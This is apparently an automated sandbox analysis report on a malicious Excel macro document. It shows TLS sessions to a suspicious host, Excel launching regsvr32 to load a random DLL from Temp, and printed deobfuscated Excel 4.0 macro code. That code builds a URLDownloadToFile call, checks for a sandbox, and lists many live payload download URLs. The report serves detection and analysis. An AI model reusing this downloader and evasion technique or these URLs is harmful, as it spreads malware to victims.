Jan 12, 2021 07:40:30.113729954 CET	77.220.64.37	443	192.168.2.22	49233	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:40:32.462321043 CET	77.220.64.37	443	192.168.2.22	49238	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:40:34.535433054 CET	77.220.64.37	443	192.168.2.22	49242	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:40:36.631721020 CET	77.220.64.37	443	192.168.2.22	49246	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:40:38.685161114 CET	77.220.64.37	443	192.168.2.22	49250	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:40:40.730827093 CET	77.220.64.37	443	192.168.2.22	49254	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:40:42.774066925 CET	77.220.64.37	443	192.168.2.22	49258	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:40:44.976768017 CET	77.220.64.37	443	192.168.2.22	49262	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:40:47.942837000 CET	77.220.64.37	443	192.168.2.22	49266	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:40:50.002372980 CET	77.220.64.37	443	192.168.2.22	49270	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:40:52.101597071 CET	77.220.64.37	443	192.168.2.22	49274	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:40:54.177886009 CET	77.220.64.37	443	192.168.2.22	49278	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:40:56.221548080 CET	77.220.64.37	443	192.168.2.22	49282	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:40:58.289483070 CET	77.220.64.37	443	192.168.2.22	49286	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:41:00.361535072 CET	77.220.64.37	443	192.168.2.22	49290	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:41:02.555783987 CET	77.220.64.37	443	192.168.2.22	49294	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:41:05.159917116 CET	77.220.64.37	443	192.168.2.22	49298	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:41:07.252962112 CET	77.220.64.37	443	192.168.2.22	49302	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:41:09.305660963 CET	77.220.64.37	443	192.168.2.22	49306	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:41:11.370776892 CET	77.220.64.37	443	192.168.2.22	49310	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:41:13.430650949 CET	77.220.64.37	443	192.168.2.22	49314	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:41:15.507910967 CET	77.220.64.37	443	192.168.2.22	49318	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:41:17.549895048 CET	77.220.64.37	443	192.168.2.22	49322	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:41:19.650753021 CET	77.220.64.37	443	192.168.2.22	49326	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:41:22.122325897 CET	77.220.64.37	443	192.168.2.22	49330	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:41:24.215425014 CET	77.220.64.37	443	192.168.2.22	49334	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:41:26.255388021 CET	77.220.64.37	443	192.168.2.22	49338	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:41:28.283556938 CET	77.220.64.37	443	192.168.2.22	49342	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:41:30.358275890 CET	77.220.64.37	443	192.168.2.22	49346	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:41:32.385092020 CET	77.220.64.37	443	192.168.2.22	49350	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:41:34.450143099 CET	77.220.64.37	443	192.168.2.22	49354	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:41:36.894236088 CET	77.220.64.37	443	192.168.2.22	49358	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:41:39.306799889 CET	77.220.64.37	443	192.168.2.22	49362	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:41:41.457151890 CET	77.220.64.37	443	192.168.2.22	49366	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:41:43.569616079 CET	77.220.64.37	443	192.168.2.22	49370	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:41:45.630964041 CET	77.220.64.37	443	192.168.2.22	49374	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:41:47.679960012 CET	77.220.64.37	443	192.168.2.22	49378	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:41:49.740036011 CET	77.220.64.37	443	192.168.2.22	49382	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:41:51.841461897 CET	77.220.64.37	443	192.168.2.22	49386	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:41:53.904021025 CET	77.220.64.37	443	192.168.2.22	49390	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:41:55.980370045 CET	77.220.64.37	443	192.168.2.22	49394	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:41:58.081724882 CET	77.220.64.37	443	192.168.2.22	49398	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:42:00.176278114 CET	77.220.64.37	443	192.168.2.22	49402	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:42:02.247072935 CET	77.220.64.37	443	192.168.2.22	49406	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:42:04.306580067 CET	77.220.64.37	443	192.168.2.22	49410	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2028 Parent PID: 584

General

Start time:	07:39:43
Start date:	12/01/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13fae0000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 2356 Parent PID: 2028

General

Start time:	07:39:51
Start date:	12/01/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\lwjmdgav.dll.
Imagebase:	0xff6e0000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 2328 Parent PID: 2356

General

Start time:	07:39:51
Start date:	12/01/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	-s C:\Users\user\AppData\Local\Temp\lwjmdgav.dll.
Imagebase:	0xf80000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: DW20.EXE PID: 3052 Parent PID: 2028

General

Start time:	07:40:16
Start date:	12/01/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE
Wow64 process (32bit):	false
Commandline:	'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1488
Imagebase:	0x13fc20000
File size:	995024 bytes
MD5 hash:	45A078B2967E0797360A2D4434C41DB4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: DWWIN.EXE PID: 2968 Parent PID: 3052

General

Start time:	07:40:16
Start date:	12/01/2021
Path:	C:\Windows\System32\DWWIN.EXE
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\dwwin.exe -x -s 1488
Imagebase:	0xff980000
File size:	152576 bytes
MD5 hash:	25247E3C4E7A7A73BAEEA6C0008952B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: Module1

Declaration

Line	Content
1	Attribute VB_Name = "Module1"

Executed Functions

Function pagesREviewsd, APIs: 16, Strings: 7, Number of lines: 22, Relevance: 56.022

APIs	Meta Information
Cells
SpecialCells
xlCellTypeConstants
value
Chr
Row
Split
Split
Cells
Replace	Replace("SET.NAME("b0b",CHAR(101))","?","http://148.72.88.102/iszvgm.zip") -> SET.NAME("b0b",CHAR(101)) Replace("SET.NAME("v0","n")","?","https://www.gfischool.org/u4xbtzk.rar") -> SET.NAME("v0","n") Replace("SET.NAME("i0","J")","?","http://mmogollon.com.mx/hy9x6w.zip") -> SET.NAME("i0","J") Replace("CANCEL.KEY(TRUE)","?","https://www.gfischool.org/u4xbtzk.rar") -> CANCEL.KEY(TRUE) Replace("SET.NAME("w00","\")","?","https://www.urban-mosaic.com/ana58n.zip") -> SET.NAME("w00","\") Replace("IF(ISNUMBER(SEARCH("do",GET.WORKSPACE(1))), ,CLOSE(FALSE))","?","https://dom-chel74.ru/ymuyks.rar") -> IF(ISNUMBER(SEARCH("do",GET.WORKSPACE(1))), ,CLOSE(FALSE)) Replace("SET.NAME("bb",LEFT(GET.WORKSPACE(23),(FIND("Roaming",GET.WORKSPACE(23),1)-1))&"Local"&w00&"T"&b0b&"mp"&w00)","?","https://www.urban-mosaic.com/ana58n.zip") -> SET.NAME("bb",LEFT(GET.WORKSPACE(23),(FIND("Roaming",GET.WORKSPACE(23),1)-1))&"Local"&w00&"T"&b0b&"mp"&w00) Replace("SET.NAME("o0","32")","?","http://pm.kezto.co.uk/mcluc5u.rar") -> SET.NAME("o0","32") Replace("CANCEL.KEY(TRUE)","?","http://vegainwest.pl/uom2b4zog.rar") -> CANCEL.KEY(TRUE) Replace("SET.NAME("oo0","?")","?","https://education.scrollx.in/w80l82r.zip") -> SET.NAME("oo0","https://education.scrollx.in/w80l82r.zip") Replace("SET.NAME("ab",LEFT(CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97),RAND()8+5)&".dll")","?","https://midas-mortgage.com/raycph0.zip") -> SET.NAME("ab",LEFT(CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97),RAND()8+5)&".dll") Replace("SET.NAME("w00",b0b)","?","http://jobmonster.atwebpages.com/r562ibujk.rar") -> SET.NAME("w00",b0b) Replace("SET.NAME("ba",".")","?","https://11.tecmultimedia.pt/uo3659975.rar") -> SET.NAME("ba",".") Replace("CANCEL.KEY(TRUE)","?","https://viralizi.id/pme1b4.rar") -> CANCEL.KEY(TRUE) Replace("SET.NAME("ohgdfww","Dow"&v0&"loadToFil"&w00)","?","http://laboratoriostabbler.com/c942pn.rar") -> SET.NAME("ohgdfww","Dow"&v0&"loadToFil"&w00) Replace("SET.NAME("v0","O")","?","http://www.maapaaevents.com/g11qoa5.zip") -> SET.NAME("v0","O") Replace("SET.NAME("wegb","URLM"&v0&"N")","?","https://sctask.smartconnexxionz.com/jufk0v.rar") -> 